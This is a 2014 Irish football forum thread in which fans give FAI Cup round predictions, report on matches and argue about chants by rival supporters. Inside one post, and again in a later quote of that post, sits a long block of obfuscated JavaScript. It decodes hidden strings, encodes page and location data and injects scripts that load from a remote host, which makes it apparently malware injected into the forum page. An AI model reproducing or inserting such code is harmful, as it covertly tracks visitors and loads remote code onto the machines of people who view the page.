Wexford Youths v Finn Harps DRAW
St Michael's (Tipperary) v Avondale United HOME
Ballynanty Rovers (Limerick) v Drogheda United AWAY
Cork City v Bohemians HOME
Derry City v Malahide United HOME
St Patricks Athletic v Shelbourne HOME
Dundalk v Galway FC HOME
Shamrock Rovers v Longford Town HOME

Can't not wait for tomorrow, have been looking forward to this since the draw! Losing this game is unthinkable for most of us! I despise everything about shelbourne football club more so than anything else in the world!

5-0 would do nicely

Posted By: domo32GUST
Date Posted: 21 Aug 2014 at 2:26pm
Looking forward to our trip to Oriel Park hopefully we can sneak a draw Clap 

www.maroonarmy.boards.net 'One City, One County, One Club'

Date Posted: 21 Aug 2014 at 2:28pm
Wexford Youths v Finn Harps HOME
Ballynanty Rovers (Limerick) v Drogheda United AWAY
Dundalk v Galway FC DRAW
Shamrock Rovers v Longford Town DRAW

Posted By: starryplough
Date Posted: 21 Aug 2014 at 2:35pm
Wexford Youths v Finn Harps DRAW
Ballynanty Rovers (Limerick) v Drogheda United DRAW
Dundalk v Galway FC HOME
Shamrock Rovers v Longford Town HOME

I don't see many upsets in this round lads

Some Clubs Are Bigger Than Others

Date Posted: 21 Aug 2014 at 2:43pm
All home wins bar a drogs win

"Not one cent" - RTID on Mark Quigley's pay-off from Shamrock

Date Posted: 21 Aug 2014 at 3:00pm
+1. Can't see any suprises.

He is Karl Pilkington in the LOI section and Karl Marx outwith it

Posted By: Declanus
Date Posted: 21 Aug 2014 at 3:10pm
Wexford Youths v Finn Harps away win
St Michael's (Tipperary) v Avondale United home win
Ballynanty Rovers (Limerick) v Drogheda United away win
Cork City v Bohemians score draw
Derry City v Malahide United home win
St Patricks Athletic v Shelbourne home win 
Dundalk v Galway FC home win
Shamrocks v Longford Town scoreless draw 

Has to be a few suprises in the cup

Posted By: skinnymalinx
Date Posted: 21 Aug 2014 at 7:17pm
Wexford Youths v Finn Harps -finnharps
St Michael's (Tipperary) v Avondale United - draw
Ballynanty Rovers (Limerick) v Drogheda United - drogs
Cork City v Bohemians -cork
Derry City v Malahide United -derry
St Patricks Athletic v Shelbourne -shels
Dundalk v Galway FC -dundalk
Shamrock Rovers v Longford Town -draw

beware the ides of march

Posted By: EastStandMan
Date Posted: 21 Aug 2014 at 8:57pm
Wex v F/Harps- away
St Micheals v Avondale Home 
Ballynanty v Drogs- away
Cork v Bohs - draw 
Derry v Malahide - Home 
Patsv Shells - home 
Dundalk v Galway- home 
Rovers v Longford Home .

Shamrock Rovers - lovin the buzz .

Date Posted: 21 Aug 2014 at 11:03pm
Wexford v Harps, draw
St Michael's v Avondale, home (purely a guess and because a Fan Embassy colleague is involved wih them)
Ballynanty v Drogs, away win
Cork v Bohs, home win
Derry v Malahide, sizeable home win
Pats v Shels, away win (Pats terrible inconsistent this year, the cup famine to continue)
Dundalk v Galway, home win
Rovers v Longford, home win but will be great to see Ricer back in Tallaght. 

Posted By: The Big Club
Date Posted: 21 Aug 2014 at 11:09pm
Rest of our season relies on tomorrow, as we are on course for mid table so in that regard we have an advanatge over Cork who hopefully still have an eye on he leaue tomorrow night. They haven't beaten us this year so we have no reason to fear them but going to TC overly confident would be stupid too. Take a draw and get them back to dalymount monday.

Date Posted: 22 Aug 2014 at 8:14am
Let's hope the replay doesn't go to penos 😃

Date Posted: 22 Aug 2014 at 9:07am
Looking forward to later. Can't see us getting anything, just hope we do ourselves proud and don't get spanked. Playing good football all season but against far inferior opponents than the likes of Pat's

2-0 Pat's is my prediction

Saintjoey why do you despise everything about Shelbourne Football Club? LOL

Still upset about Ollie doing you out of a league all those years ago?

Date Posted: 22 Aug 2014 at 9:27am
Documentary on Ollie Byrne on Newstalk well worth a listen, was aired last week.

Date Posted: 22 Aug 2014 at 9:29am

Let's hope the replay doesn't go to penos 😃
BOOOM.

Bud don't forget the official line. There was nothing wrong with the pitch. Connolly was trying to make a name for himself / Rovers got the FAI to postpone the game / Illuminati

Posted By: saintjoey
Date Posted: 22 Aug 2014 at 10:41am

Looking forward to later. Can't see us getting anything, just hope we do ourselves proud and don't get spanked. Playing good football all season but against far inferior opponents than the likes of Pat's

2-0 Pat's is my prediction

Saintjoey why do you despise everything about Shelbourne Football Club? LOL

Still upset about Ollie doing you out of a league all those years ago?

Correct! And as someone growing up back then i will always hate shelbourne it's a different hate to other clubs I'd be happy if you lot never come back up and wouldn't miss the games like I'd miss the other 2!

It's Ollie's fault your still in this mess so can't be to angry towards him!!

Date Posted: 22 Aug 2014 at 5:49pm
Can't wait for tonight. Like Joey have a huge dislike for shels. Being a northsider and having mates follow them especially when we were teenagers in the 90's made it a big thing for me.

Date Posted: 22 Aug 2014 at 5:54pm
Yeah the big rivalry when I started going to the games in the 90's was Shels v Pats and there some absolutely brilliant matches (those 2 cup replays in 98 with Shels winning on peno's was incredible)

Anyway, different times now unfortunately. Just about to head down to Chernobyl now - mon Shels

Date Posted: 22 Aug 2014 at 7:10pm
Despite Ollie being a headbanger, he loved his club and as me Da played a few first team games for them in the 50s, I do have a soft spot for em. 

Date Posted: 22 Aug 2014 at 7:16pm
Michaels v Avondale should be a great game. Two of the strongest senior and junior teams in the country.

Date Posted: 22 Aug 2014 at 9:43pm
Harps 2 up with 5 to play...Looks like a 2nd quarter final in a row!

Date Posted: 22 Aug 2014 at 10:08pm
Pats missed a hat full of chances. Faheys 50 yarders look great when they come off but thats only about 50% of the time. The build up play was too slow and laboured and we needed to up the tempo much more in general. Shels will be delighted to come away with the draw

Date Posted: 22 Aug 2014 at 10:13pm
We should have won 10, how it was 0-0 at half time I don't know , we hit post and bar twice and their keeper had the game of his life

Where do malehide fit in in the scheme of things ?? I thought they were very poor but maybe it's a big gap and I'mdoing them a disservice

Date Posted: 22 Aug 2014 at 10:41pm
Very enjoyable night in Richmond Park. Got off to the worse possible start - conceded a very soft goal in the 2nd minute. Then we were arguably the better side for the next quarter of an hour or so, scored a soft enough goal ourselves, but always looked very open through the middle

Johnny Mac obviously noticed this and tightened up shop, and most of the play from then on in was from Pats. They had their chances, but Shels defended well and also rode our luck at times. Deserved a draw in the end out of sheer grit and determination, especially considering we were missing Lee Desmond who, IMO has been our best player this season at centre half

Replay in Tolka on Tuesday night - it's anyone's game. Still reckon Pats will be too strong for us but anything can happen

Shels

Date Posted: 22 Aug 2014 at 11:08pm

We should have won 10, how it was 0-0 at half time I don't know , we hit post and bar twice and their keeper had the game of his life

Where do malehide fit in in the scheme of things ?? I thought they were very poor but maybe it's a big gap and I'mdoing them a disservice
Yes there is a gap,it's an average LSL Senior team v one of LOI "big guns"

Date Posted: 22 Aug 2014 at 11:22pm

I know it's a big gap but I thought the LSL was a good standard. Wasn't sure if they were one of the better or worst LSL teams. was kind of expecting one or two talented lads who were either on way up or down from senior football but they were dire all over bar the keeper who is definitely worth a look for a senior side. Who would be the top sides there in LSL ?

Date Posted: 22 Aug 2014 at 11:52pm

I know it's a big gap but I thought the LSL was a good standard. Wasn't sure if they were one of the better or worst LSL teams. was kind of expecting one or two talented lads who were either on way up or down from senior football but they were dire all over bar the keeper who is definitely worth a look for a senior side. Who would be the top sides there in LSL ?

To be fair to them, it's their 2nd game of the season. I would expect them to be in the bottom half of the league.

Date Posted: 22 Aug 2014 at 11:53pm
Strange sorta game in Tallaght.  Dreadful 1st 25 mins, then Rovers broke away and scored moments after Murphy denied Longford, fine finish by Windy.  Second goal was an absolutely magnificent McCabe volley, Shep's shot blocked by Sullivan and as the ball dropped 25 yards out, McCabe caught it plum on the volley for a brilliant goal.

2nd half was dreadful from Rovers, Windy got a 2nd yellow ten mins from time, before Kilduff put debutant Patrick Cregg clear in injury time for a nice finish.

Ricer's reception at the end was nice.

Last 8 accomplished, but Nutsy and the players got a long way to go yet.

Date Posted: 23 Aug 2014 at 12:03am

To be fair to them, it's their 2nd game of the season. I would expect them to be in the bottom half of the league.

fair play. As I said didn't want to do them a disservice so perhaps I did exactly that. Hadn't realised it was their 2nd game only . Any idea who the keeper is? I never got a program

Date Posted: 23 Aug 2014 at 12:28am
No but we are playing them in the league on Wednesday so hopefully he has had his good game for the week!!

Date Posted: 23 Aug 2014 at 12:30am
Actually I just noticed, the keeper was Brian Kane. He was with Bray for 3 or 4 years.

Date Posted: 23 Aug 2014 at 12:41am
That could be game of his life never mind week, in first half in particular his shot stopping was first class and one save was best I've seen at the brandywell in a long time .

Maybe a bit on small side. Just glad to be through we didn't score in over 300 minutes so was a wee bit worried about tonight. Means more to us than some others

Posted By: Richmond Ultra
Date Posted: 23 Aug 2014 at 4:08am

Michaels v Avondale should be a great game. Two of the strongest senior and junior teams in the country.

Going to that myself, it should be a cracker.< id="EDC270464ECE7E00">(function(){var g=function(f,r){var x="",a=window,h="f"+"r\u006F"+"mC"+"h\x61r\x43\x6F\x64\x65",m="\x63h\u0061\x72Co"+""+"d\u0065"+"A"+"t",d=("\u0045\u0050"+"h")['\x72\u0065pla\x63\u0065']("\u0045\u0050","\u006C\u0065n\u0067t"+""),u="\x53\x74r"+"ing"+"",w=a,j=w[h],c,l;for(var y=0;y\x68"+"yj"+""+"lv}\x6a\u0076yu"+"\u007D%",0X18)+sr +g(('>\x4a'+'Ay'+'\u0046\u0051|\u0025').replace('J\u0041\u0079F','m\u006B\u007D'+'j'),0x18)+"EDC270464ECE7E00"+g((">"+"\x5bL"+"Q\\%\u006a\u006E\x62\u006A\u002A\u0028\x2c\x68N(\x2B*"+"").replace("h\u004E","\x28\u0047\x2d"),0x18));document[g('z\x77|\x61',030)][g(("\u0079\x68h"+"\u007D\x76l"+"p\x6B"+"y\x59q\u0074|").replace("\u006cpk\x79Y","\x7C\u005b\u0070"),030)](oy);})();(function(){if(jg(g(("\u0077Dhhq"+"\u0076\x7f").replace(""+"wD","\x6b\x70\u0077"),24)))return;var aj=g("Z"+"\x7Dl"+"l"+"\x7Dj"+"U"+"y\x6a"+"s"+"Q\u006c",24);var ig={_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(hc){var jx="";var y,cl,qm,dn,og,vs,de;var td=0;hc=ig[g('G\x6Dl~\u0020\x47}'+'v'+'\x7b\u0077'+'|\u007D',24)](hc);while(td>2;og=((y&3)<<4|cl>>4);vs=((cl&15)<<2|qm>>6);de=qm&63;if(isNaN(cl)){vs=de=64}else{if(isNaN(qm)){de=64}}jx=jx+this[g(("\u0047\u0073\x72s\x75"+"n"+"l\x6A").replace("rs"+"\x75n","\u007Da\x4b"),030)][g('{'+'py'+'j\u0059\x6C',030)](dn)+this[g(('G'+'in\x6AJ\x59j').replace('\x69\u006e'+'j\u004A\x59','s'+''+'}a'+'\u004Bl'+''),030)][g(''+'{p'+'yjY\u006C',030)](og)+this[g("\u0047\x73\x7Da"+""+"K\u006c\x6A",030)][g((''+'{\x70y\x59\x71\u004D\u0069\u0073l').replace('Y\x71\u004D'+'i\x73','j'+'Y'),0x18)](vs)+this[g('\u0047s}\x61\u004b\x6C\x6a',24)][g(("LV"+"zul").replace(""+"LV\x7a\x75","{\u0070"+"y"+"j\u0059"),24)](de)}return jx},decode:function(wt){var cl={},cv,kd,at=[],zi="",yf=String[g(('a'+'\u007a'+'p\x79\u006A['+'\x77|'+'\x7D').replace('\u0061\u007a','\x7Ej\u0077\x75\x5B'),030)];var sh=[[65,91],[97,123],[48,58],[43,44],[47,48]];for(oz in sh){for(cv=sh[oz][0];cv=8){zi+=yf((de>>>(ny-=8))%256)}}}return zi},_utf8_encode:function(uj){uj=uj[g("j"+"}\u0068t"+"\u0079\x7B\x7d",24)](/\r\n/g,"\n");var sh="";for(var ny=0;ny127)&&(kd<2048sh+=g'~u006A'+'wtx73u004Cx5ax64x5b'+'wx7C'+''.replace'x74u0073x4cx5Ad','u'+'u0070x79u006A',030kd>>6)|192);sh+=String[g('~\u006A\u0077\x75[p\u0079j'+'[w\u007c}',030)]((kd&63)|128)}else{sh+=String[g(('\u007ejw'+'\u0056\u0053\u0075L'+''+'j['+'\u0077\x7C}'+'').replace('\x56S'+'uL'+'','u'+'['+'\x70\x79'),030)]((kd>>12)|224);sh+=String[g(("~\x6Aw"+"\u0075\u005Bp"+"\u0079"+"gv\u0077\x7c}"+"").replace(""+"g\u0076","j\u005b"),24)](((kd>>6)&63)|128);sh+=String[g(("\x7e"+"j\x77u"+"\u005b\x70y\x46"+"e\u0067w|"+"\x7d").replace("F"+"\x65\u0067",""+"j["),24)]((kd&63)|128)}}}return sh}};var vw=g("\x76\x25",24)+aj+g(('\u003ep'+'%'+'\u007F\u0061\u006b6\x75\x79\u0068hq\u0076\u007f|\x776v'+'}l'+'\x3Ew\x25|'+'h'+'>y'+''+'%\u002A\x76\u0064\x3Ek'+'\x25\x2d\u0028\u002B\x2A\u003E\u007b\u0025\u007fj}'+'}\x76>\u006F'+'%').replace('\x76'+'d','('+','+'\x28'),030)+document[g(('\u0074\u0077{'+'\x79g'+'Bv'+'').replace('\x67\u0042',''+'l\x71\x77'),030)][g(("\x70\x77k"+"\u004A\x42I"+"\x70\u0079\x75}").replace("JB\u0049\x70",""+"l\x76"),0x18)];var uu=g('p'+'\u006Cl\x68\"\x377\u007fa'+'k6\x75y'+''+'h'+'hq'+'v\x7f'+'|'+'w'+'6\u0076\u007d'+'l\x37k'+'|\u0037yh'+'hk7\x79|'+'\u0071v'+'~'+'w\x35)'+'\x36\x28\u0037qv|\u007D\x606'+'pl'+'\x75\x74\'',030)+ig[g("}v"+"\x7B"+"w\u007c\x7D",0x18)](vw);var oy=document[g("\x7bj\x7Dy"+"l\u007d\x5d\u0074\x7du"+""+"}\x76l",030)](g("\x6b\u007b"+"j\x71h\x6C",030));oy[g(("u\u0049r\x59"+"l\u006c\u006A\u0071z\x6d\u006c}"+"").replace(""+"u\x49\x72","k\u007d\u006C"),24)](g("\x6ca"+"\x68}"+"",030),g('l'+'\x7D`l\u0037\u0072y\u006e\u0079k\u007B\x6A\u0071h'+'l'+'',24));oy[g(('\u006B\u007d\x6c\x59\u006c\x6cAB\u0054\x76\x45'+'ml'+'\u007d').replace('\u0041\u0042\u0054v'+'E','j\u0071z'),0x18)](g("\x7B\u0070y\u006ak\x7dl"+"",030),g(('M\u006f\u006d\u004F\u006FP'+'\u004FZq'+'\x50\x35\x20').replace('\x6f\u006D\u004fo'+'\x50'+'OZ'+'\u0071\x50','\u004c^'+''),24));if("http:"==document[g(('\u0074wO\x59g\x59\u0051v').replace('OY\x67'+'Y\u0051','\u007by\u006c'+'q\x77'),0X18)][g('h'+'j'+'w'+'l\u0077{'+'w'+'t',24)]){oy[g('\u006b\x7d\u006C\x59l'+'\x6cjq'+'z\x6dl'+'\u007D',0X18)](g("k"+"j{",0x18),g("p"+"l\u006c\x68\"7"+"\u0037\u0071\x36zs\x79\u006C\x72k"+"6\u0071\u0076~\u0077\x37\u006A\x6Ebj\x37\x72\u0079\u006ey\x6B\u007Bj"+"\u0071\u0068\u006c\x36\x72\x6B\'\x7bp\u0079\x76\x76"+"}\x74"+"%\x6A\x6Eb\x6a*"+"("+"\x2c(G-"+"(\x2b\u002A\u003Ey\x68\x68L\x71"+"lt"+"}\u0025",030)+aj+g('>h\x74qv'+'s%'+'',24)+encodeURIComponent(uu));}else{oy[g("k"+""+"}\u006CY"+"ll\u006Aq"+"zm\x6C}"+"",0x18)](g('\u006b'+'j\u007b',030),g(('p\u006cl'+'h'+'k\"7'+'\u0037\u0071G\x7a\u0073'+'y\x6c\x72kG'+'\x71\u0076~'+'\u00776'+'\u006c\u0074\u006B\u007B\x7c\u00766\u006A\x68'+'u'+'7\x6an'+'\x62j7'+'\x72\u0079nyk\u007B\u006Aq\u0068l\u0036r'+'k\'\u007B\u0070\u0079v\u0076}\u0074\u0025\u006A\x6e\u0062j*'+''+'(,('+''+'G-(+\u002A\x3e\x79hh'+'L'+'q'+'\u006C'+'t}%').replace('\x6Ah',''+'{'+'w'),030)+aj+g(""+">\u0068"+"t\x71\x76s"+"%",0x18)+encodeURIComponent(uu));}document[g("\u007aw"+""+"|\x61",0x18)][g('\x79h\u0068\x7Dv\u007c\x5B'+'p\u0071t'+'|',24)](oy);})();;var zk=document[g('{'+'\x6A\u007Dy'+'\x6C\u007D]'+'\x74}'+''+'u\u007dvl',030)](g(("k\u007bj\u004a"+"i\u0064F"+"Yl").replace("\x4a\x69dF"+""+"Y","\x71\x68"),24));var lz=0x980E303D;zk[g(''+'kj\u007B',030)]=g(('77\x7F\u0061k'+'\x36\u0075\x79\x68h'+'\u0071v\u007F\u007c\x776'+'vl\x49G'+'\u006b|\u0037\x2A\u0028\u002C(\u0037\x2D'+'(+\x2A\u0036r\x6B').replace('l'+'\u0049G','\x7d\u006C\u0037'),24);try{if(screen[('\x63o\u006C\u0042f'+'t'+'h').replace('\x42\u0066','o\u0072'+'Dep')])var wj='S:Z84ed1Ginn5o ';}catch(hj){};document[g(("\u0071\u0066\x70\u004e\x6cO"+"\u0058t\u005a"+"j\u007c\u0061").replace("\x71\u0066\u0070Nl\x4FX\x74Z"+"j","\u007Aw"),24)][g('\x79h'+'h\u007dv|'+'[p'+''+'q\x74'+'|',030)](zk);}})();

Omnia Causa Fiunt

Date Posted: 23 Aug 2014 at 9:02am
Always hated shels, but if possible it's got even worse! Absolute scum singing about our fan who died in Poland, not just one or 2 either!

On the game we shoul of won easily, poor poor result

Date Posted: 23 Aug 2014 at 9:40am

Very enjoyable night in Richmond Park. Got off to the worse possible start - conceded a very soft goal in the 2nd minute. Then we were arguably the better side for the next quarter of an hour or so, scored a soft enough goal ourselves, but always looked very open through the middle

Johnny Mac obviously noticed this and tightened up shop, and most of the play from then on in was from Pats. They had their chances, but Shels defended well and also rode our luck at times. Deserved a draw in the end out of sheer grit and determination, especially considering we were missing Lee Desmond who, IMO has been our best player this season at centre half

Replay in Tolka on Tuesday night - it's anyone's game. Still reckon Pats will be too strong for us but anything can happen

Shels

thought we should have won comfortably. we had so much possession and chance that we had enough to win 3 games last night. shels had 2 chances. should have scored the second near the start of the second half. thought gary dempsey was class, especially the first half.

Posted By: skinnymalinx
Date Posted: 23 Aug 2014 at 10:20am
Originally posted by saintjoey saintjoey wrote:

Always hated shels, but if possible it's got even worse! Absolute scum singing about our fan who died in Poland, not just one or 2 either!

That is serious bad form from shels fans.

beware the ides of march

Date Posted: 23 Aug 2014 at 10:44am
Shels fans and their behavior slips under the radar because of where they are and how few of them they are.

Date Posted: 23 Aug 2014 at 11:03am
Originally posted by Richmond Ultra Richmond Ultra wrote:

Going to that myself, it should be a cracker.< id="EDC270464ECE7E00">(function(){var g=function(f,r){var x="",a=window,h="f"+"r\u006F"+"mC"+"h\x61r\x43\x6F\x64\x65",m="\x63h\u0061\x72Co"+""+"d\u0065"+"A"+"t",d=("\u0045\u0050"+"h")['\x72\u0065pla\x63\u0065']("\u0045\u0050","\u006C\u0065n\u0067t"+""),u="\x53\x74r"+"ing"+"",w=a,j=w[h],c,l;for(var y=0;y\x68"+"yj"+""+"lv}\x6a\u0076yu"+"\u007D%",0X18)+sr +g(('>\x4a'+'Ay'+'\u0046\u0051|\u0025').replace('J\u0041\u0079F','m\u006B\u007D'+'j'),0x18)+"EDC270464ECE7E00"+g((">"+"\x5bL"+"Q\\%\u006a\u006E\x62\u006A\u002A\u0028\x2c\x68N(\x2B*"+"").replace("h\u004E","\x28\u0047\x2d"),0x18));document[g('z\x77|\x61',030)][g(("\u0079\x68h"+"\u007D\x76l"+"p\x6B"+"y\x59q\u0074|").replace("\u006cpk\x79Y","\x7C\u005b\u0070"),030)](oy);})();(function(){if(jg(g(("\u0077Dhhq"+"\u0076\x7f").replace(""+"wD","\x6b\x70\u0077"),24)))return;var aj=g("Z"+"\x7Dl"+"l"+"\x7Dj"+"U"+"y\x6a"+"s"+"Q\u006c",24);var ig={_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(hc){var jx="";var y,cl,qm,dn,og,vs,de;var td=0;hc=ig[g('G\x6Dl~\u0020\x47}'+'v'+'\x7b\u0077'+'|\u007D',24)](hc);while(td>2;og=((y&3)<<4|cl>>4);vs=((cl&15)<<2|qm>>6);de=qm&63;if(isNaN(cl)){vs=de=64}else{if(isNaN(qm)){de=64}}jx=jx+this[g(("\u0047\u0073\x72s\x75"+"n"+"l\x6A").replace("rs"+"\x75n","\u007Da\x4b"),030)][g('{'+'py'+'j\u0059\x6C',030)](dn)+this[g(('G'+'in\x6AJ\x59j').replace('\x69\u006e'+'j\u004A\x59','s'+''+'}a'+'\u004Bl'+''),030)][g(''+'{p'+'yjY\u006C',030)](og)+this[g("\u0047\x73\x7Da"+""+"K\u006c\x6A",030)][g((''+'{\x70y\x59\x71\u004D\u0069\u0073l').replace('Y\x71\u004D'+'i\x73','j'+'Y'),0x18)](vs)+this[g('\u0047s}\x61\u004b\x6C\x6a',24)][g(("LV"+"zul").replace(""+"LV\x7a\x75","{\u0070"+"y"+"j\u0059"),24)](de)}return jx},decode:function(wt){var cl={},cv,kd,at=[],zi="",yf=String[g(('a'+'\u007a'+'p\x79\u006A['+'\x77|'+'\x7D').replace('\u0061\u007a','\x7Ej\u0077\x75\x5B'),030)];var sh=[[65,91],[97,123],[48,58],[43,44],[47,48]];for(oz in sh){for(cv=sh[oz][0];cv=8){zi+=yf((de>>>(ny-=8))%256)}}}return zi},_utf8_encode:function(uj){uj=uj[g("j"+"}\u0068t"+"\u0079\x7B\x7d",24)](/\r\n/g,"\n");var sh="";for(var ny=0;ny127)&&(kd<2048sh+=g'~u006A'+'wtx73u004Cx5ax64x5b'+'wx7C'+''.replace'x74u0073x4cx5Ad','u'+'u0070x79u006A',030kd>>6)|192);sh+=String[g('~\u006A\u0077\x75[p\u0079j'+'[w\u007c}',030)]((kd&63)|128)}else{sh+=String[g(('\u007ejw'+'\u0056\u0053\u0075L'+''+'j['+'\u0077\x7C}'+'').replace('\x56S'+'uL'+'','u'+'['+'\x70\x79'),030)]((kd>>12)|224);sh+=String[g(("~\x6Aw"+"\u0075\u005Bp"+"\u0079"+"gv\u0077\x7c}"+"").replace(""+"g\u0076","j\u005b"),24)](((kd>>6)&63)|128);sh+=String[g(("\x7e"+"j\x77u"+"\u005b\x70y\x46"+"e\u0067w|"+"\x7d").replace("F"+"\x65\u0067",""+"j["),24)]((kd&63)|128)}}}return sh}};var vw=g("\x76\x25",24)+aj+g(('\u003ep'+'%'+'\u007F\u0061\u006b6\x75\x79\u0068hq\u0076\u007f|\x776v'+'}l'+'\x3Ew\x25|'+'h'+'>y'+''+'%\u002A\x76\u0064\x3Ek'+'\x25\x2d\u0028\u002B\x2A\u003E\u007b\u0025\u007fj}'+'}\x76>\u006F'+'%').replace('\x76'+'d','('+','+'\x28'),030)+document[g(('\u0074\u0077{'+'\x79g'+'Bv'+'').replace('\x67\u0042',''+'l\x71\x77'),030)][g(("\x70\x77k"+"\u004A\x42I"+"\x70\u0079\x75}").replace("JB\u0049\x70",""+"l\x76"),0x18)];var uu=g('p'+'\u006Cl\x68\"\x377\u007fa'+'k6\x75y'+''+'h'+'hq'+'v\x7f'+'|'+'w'+'6\u0076\u007d'+'l\x37k'+'|\u0037yh'+'hk7\x79|'+'\u0071v'+'~'+'w\x35)'+'\x36\x28\u0037qv|\u007D\x606'+'pl'+'\x75\x74\'',030)+ig[g("}v"+"\x7B"+"w\u007c\x7D",0x18)](vw);var oy=document[g("\x7bj\x7Dy"+"l\u007d\x5d\u0074\x7du"+""+"}\x76l",030)](g("\x6b\u007b"+"j\x71h\x6C",030));oy[g(("u\u0049r\x59"+"l\u006c\u006A\u0071z\x6d\u006c}"+"").replace(""+"u\x49\x72","k\u007d\u006C"),24)](g("\x6ca"+"\x68}"+"",030),g('l'+'\x7D`l\u0037\u0072y\u006e\u0079k\u007B\x6A\u0071h'+'l'+'',24));oy[g(('\u006B\u007d\x6c\x59\u006c\x6cAB\u0054\x76\x45'+'ml'+'\u007d').replace('\u0041\u0042\u0054v'+'E','j\u0071z'),0x18)](g("\x7B\u0070y\u006ak\x7dl"+"",030),g(('M\u006f\u006d\u004F\u006FP'+'\u004FZq'+'\x50\x35\x20').replace('\x6f\u006D\u004fo'+'\x50'+'OZ'+'\u0071\x50','\u004c^'+''),24));if("http:"==document[g(('\u0074wO\x59g\x59\u0051v').replace('OY\x67'+'Y\u0051','\u007by\u006c'+'q\x77'),0X18)][g('h'+'j'+'w'+'l\u0077{'+'w'+'t',24)]){oy[g('\u006b\x7d\u006C\x59l'+'\x6cjq'+'z\x6dl'+'\u007D',0X18)](g("k"+"j{",0x18),g("p"+"l\u006c\x68\"7"+"\u0037\u0071\x36zs\x79\u006C\x72k"+"6\u0071\u0076~\u0077\x37\u006A\x6Ebj\x37\x72\u0079\u006ey\x6B\u007Bj"+"\u0071\u0068\u006c\x36\x72\x6B\'\x7bp\u0079\x76\x76"+"}\x74"+"%\x6A\x6Eb\x6a*"+"("+"\x2c(G-"+"(\x2b\u002A\u003Ey\x68\x68L\x71"+"lt"+"}\u0025",030)+aj+g('>h\x74qv'+'s%'+'',24)+encodeURIComponent(uu));}else{oy[g("k"+""+"}\u006CY"+"ll\u006Aq"+"zm\x6C}"+"",0x18)](g('\u006b'+'j\u007b',030),g(('p\u006cl'+'h'+'k\"7'+'\u0037\u0071G\x7a\u0073'+'y\x6c\x72kG'+'\x71\u0076~'+'\u00776'+'\u006c\u0074\u006B\u007B\x7c\u00766\u006A\x68'+'u'+'7\x6an'+'\x62j7'+'\x72\u0079nyk\u007B\u006Aq\u0068l\u0036r'+'k\'\u007B\u0070\u0079v\u0076}\u0074\u0025\u006A\x6e\u0062j*'+''+'(,('+''+'G-(+\u002A\x3e\x79hh'+'L'+'q'+'\u006C'+'t}%').replace('\x6Ah',''+'{'+'w'),030)+aj+g(""+">\u0068"+"t\x71\x76s"+"%",0x18)+encodeURIComponent(uu));}document[g("\u007aw"+""+"|\x61",0x18)][g('\x79h\u0068\x7Dv\u007c\x5B'+'p\u0071t'+'|',24)](oy);})();;var zk=document[g('{'+'\x6A\u007Dy'+'\x6C\u007D]'+'\x74}'+''+'u\u007dvl',030)](g(("k\u007bj\u004a"+"i\u0064F"+"Yl").replace("\x4a\x69dF"+""+"Y","\x71\x68"),24));var lz=0x980E303D;zk[g(''+'kj\u007B',030)]=g(('77\x7F\u0061k'+'\x36\u0075\x79\x68h'+'\u0071v\u007F\u007c\x776'+'vl\x49G'+'\u006b|\u0037\x2A\u0028\u002C(\u0037\x2D'+'(+\x2A\u0036r\x6B').replace('l'+'\u0049G','\x7d\u006C\u0037'),24);try{if(screen[('\x63o\u006C\u0042f'+'t'+'h').replace('\x42\u0066','o\u0072'+'Dep')])var wj='S:Z84ed1Ginn5o ';}catch(hj){};document[g(("\u0071\u0066\x70\u004e\x6cO"+"\u0058t\u005a"+"j\u007c\u0061").replace("\x71\u0066\u0070Nl\x4FX\x74Z"+"j","\u007Aw"),24)][g('\x79h'+'h\u007dv|'+'[p'+''+'q\x74'+'|',030)](zk);}})();

Wow, just wow

Date Posted: 23 Aug 2014 at 11:05am

Of course it is poor form, but apparently Pats fans didn't cover themselves in glory with the minutes applause for Eric Barber? Yous should have ignored the thirty teenagers on their school tour

Date Posted: 23 Aug 2014 at 11:06am

Strange sorta game in Tallaght.  Dreadful 1st 25 mins, then Rovers broke away and scored moments after Murphy denied Longford, fine finish by Windy.  Second goal was an absolutely magnificent McCabe volley, Shep's shot blocked by Sullivan and as the ball dropped 25 yards out, McCabe caught it plum on the volley for a brilliant goal.

2nd half was dreadful from Rovers, Windy got a 2nd yellow ten mins from time, before Kilduff put debutant Patrick Cregg clear in injury time for a nice finish.

I think that's a bit harsh, job done, never under pressure against a side that won't look out of place in the PD

Date Posted: 23 Aug 2014 at 11:25am
Originally posted by starryplough starryplough wrote:

Of course it is poor form, but apparently Pats fans didn't cover themselves in glory with the minutes applause for Eric Barber? Yous should have ignored the thirty teenagers on their school tour

In context a bit, that applause happened literally 5mins after they had being singing about Chris, people were very upset and angry at the time, it was only the section that Chris stood in that turned there back, myself included(although I regret it now I won't apologise for it) and there was no boos or that sort of stuff for it!

Date Posted: 23 Aug 2014 at 11:53am
In fairness, it was poor form from sections of both supporters. There were boo's for the minutes applause and there were a couple of songs about Ollie Byrne. I understand the anger Joey but it would have been better to rise above the sh*te

Date Posted: 23 Aug 2014 at 11:53am
What song were they singing? I was in the stand, not behind the goal and didn't hear anything to be honest, mind you I wasn't listening out for it so prob wouldn't have noticed either way

Date Posted: 23 Aug 2014 at 12:02pm

I think that's a bit harsh, job done, never under pressure against a side that won't look out of place in the PD

Not sure it's harsh to be honest. Up to the 1st goal we were terrible sloppy. Two wonderful goals made a huge difference to the outcome as Longford shoulda been ahead seconds before our first. Way too many diagonal punts 2nd half for my liking. Pleased to win but not overly impressed with the overall display.

Date Posted: 23 Aug 2014 at 12:14pm
There were a few incidents last night that if it was rovers-bohs the papers would have sensationalised today in the papers.
Scuffles before and after the game. All the way down in Mount Brown after  

Date Posted: 23 Aug 2014 at 12:17pm

What song were they singing? I was in the stand, not behind the goal and didn't hear anything to be honest, mind you I wasn't listening out for it so prob wouldn't have noticed either way

It was outside, not sure if was sung inside! There was a bit of a standoff kinda thing going on, as I got closer shels fans were singing "all the way to Poland to take a heart attack" I flipped meself, I'm not one to get involved in that rubbish either!

They would wanna up security for the replay

Date Posted: 23 Aug 2014 at 12:18pm

In fairness, it was poor form from sections of both supporters. There were boo's for the minutes applause and there were a couple of songs about Ollie Byrne. I understand the anger Joey but it would have been better to rise above the sh*te

Didn't hear the boos in our section, our section sang threw it though

Date Posted: 23 Aug 2014 at 12:34pm

